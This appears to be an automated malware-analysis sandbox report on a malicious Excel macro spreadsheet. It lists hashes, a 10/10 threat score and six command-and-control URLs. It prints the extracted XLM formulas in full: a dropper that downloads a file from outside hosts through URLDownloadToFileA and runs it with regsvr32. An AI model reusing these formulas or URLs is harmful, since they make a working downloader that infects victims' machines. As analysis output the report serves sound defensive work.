Overview

overview

10

Static

static

10

986d882593...0.xlsm

windows7-x64

10

986d882593...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    986d88259310f18727666228ace1967226fe227e3da45d89a8e115b3d4894c30

  • Size

    46KB

  • Sample

    241120-alezxa1kdp

  • MD5

    1176c6ac1062132d2b83037e64c3cea1

  • SHA1

    b57262a9472b10be40f864a515e6d9e4b22030ee

  • SHA256

    986d88259310f18727666228ace1967226fe227e3da45d89a8e115b3d4894c30

  • SHA512

    d4af7584a65dbc6f7a06f560bcb06be7e07a28ba0de8d7af327afde63d460844e3062cea85dba433c539a39a365ab0928cf526c50cdb262e16b2da731560328f

  • SSDEEP

    768:AOo2ODOevZCwrvtzyzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfpDDG:AOo1D+tT5fTR4Lh1NisFYBc3cr+UqVfo

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gokcevizyon.com/sBaEb/

http://henrysfreshroast.com/fxNufTnf3ox/

http://sorathlions.com/tmp/z5mkAKCYsVW70w/

http://www.ajaxmatters.com/c7g8t/TkqG7pcYizOAj/

https://cricketaddictorsassociation.com/zuug/UH8fBAITr4N/

https://ewestern.com/k/vEQX/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gokcevizyon.com/sBaEb/","..\sei.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/fxNufTnf3ox/","..\sei.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sorathlions.com/tmp/z5mkAKCYsVW70w/","..\sei.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/TkqG7pcYizOAj/","..\sei.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://cricketaddictorsassociation.com/zuug/UH8fBAITr4N/","..\sei.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ewestern.com/k/vEQX/","..\sei.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gokcevizyon.com/sBaEb/
xlm40.dropper

http://henrysfreshroast.com/fxNufTnf3ox/

Targets

    • Target

      986d88259310f18727666228ace1967226fe227e3da45d89a8e115b3d4894c30

    • Size

      46KB

    • MD5

      1176c6ac1062132d2b83037e64c3cea1

    • SHA1

      b57262a9472b10be40f864a515e6d9e4b22030ee

    • SHA256

      986d88259310f18727666228ace1967226fe227e3da45d89a8e115b3d4894c30

    • SHA512

      d4af7584a65dbc6f7a06f560bcb06be7e07a28ba0de8d7af327afde63d460844e3062cea85dba433c539a39a365ab0928cf526c50cdb262e16b2da731560328f

    • SSDEEP

      768:AOo2ODOevZCwrvtzyzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfpDDG:AOo1D+tT5fTR4Lh1NisFYBc3cr+UqVfo

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks